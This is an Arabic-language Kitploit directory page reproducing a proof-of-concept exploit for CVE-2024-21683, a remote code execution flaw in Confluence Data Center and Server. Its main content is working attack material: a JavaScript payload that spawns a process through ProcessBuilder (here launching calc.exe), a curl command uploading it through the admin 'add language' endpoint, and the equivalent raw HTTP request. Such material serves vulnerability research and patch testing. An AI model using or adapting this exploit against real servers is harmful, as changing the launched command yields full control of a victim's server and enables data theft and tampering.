Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server — هذه الثغرة الأمنية يمكن أن تسمح للمهاجم بالسيطرة الكاملة على خادم Confluence المعرّض للخطر. وقد يسمح ذلك للمهاجم بسرقة البيانات، أو تعديلها، أو تعطيل توفّر الخادم. | Kitploit
أدوات/GitHubGitHub/absholi7ly/-cve-2024-21683-rce-in-confluence-data-center-and-server
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubabsholi7ly/-cve-2024-21683-rce-in-confluence-data-center-and-server

-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server

هذه الثغرة الأمنية يمكن أن تسمح للمهاجم بالسيطرة الكاملة على خادم Confluence المعرّض للخطر. وقد يسمح ذلك للمهاجم بسرقة البيانات، أو تعديلها، أو تعطيل توفّر الخادم.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
113منذ 2 سنواتلم تتم المراجعة بعد

-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server

هذه الثغرة قد تسمح للمهاجم بالسيطرة الكاملة على خادم Confluence المتأثر. وقد تسمح للمهاجم بسرقة البيانات، أو تعديل البيانات، أو تعطيل توفر الخادم.

Poc

  • أنشئ ملف JavaScript وأعطه اسماً (exploit.js) وضع السطر التالي
root@kitploit:~
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()

ثم أرسل الطلب لرفع لغة جديدة عبر الأمر

root@kitploit:~
curl -X POST http://[IP_address]:8090/admin/plugins/newcode/addlanguage.action -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvguW5DY0BuQ87x08" -F "atl_token=[atl_token]" -F "[email protected];filename=exploit.js" -F "newLanguageName=RCE"

أو هذا الطلب

root@kitploit:~
POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 512
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvguW5DY0BuQ87x08
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/admin/plugins/newcode/save.action
Accept-Encoding: gzip, deflate, br
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: [Your cookies ]
Connection: close

------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="atl_token"

 [ atl_token ]
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="languageFile"; filename="exploit.js"
Content-Type: text/javascript

new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="newLanguageName"

RCE
------WebKitFormBoundaryvguW5DY0BuQ87x08--

إذا نجح استغلال الثغرة، فستفتح الآلة الحاسبة على جهازك.

تنزيل الأداة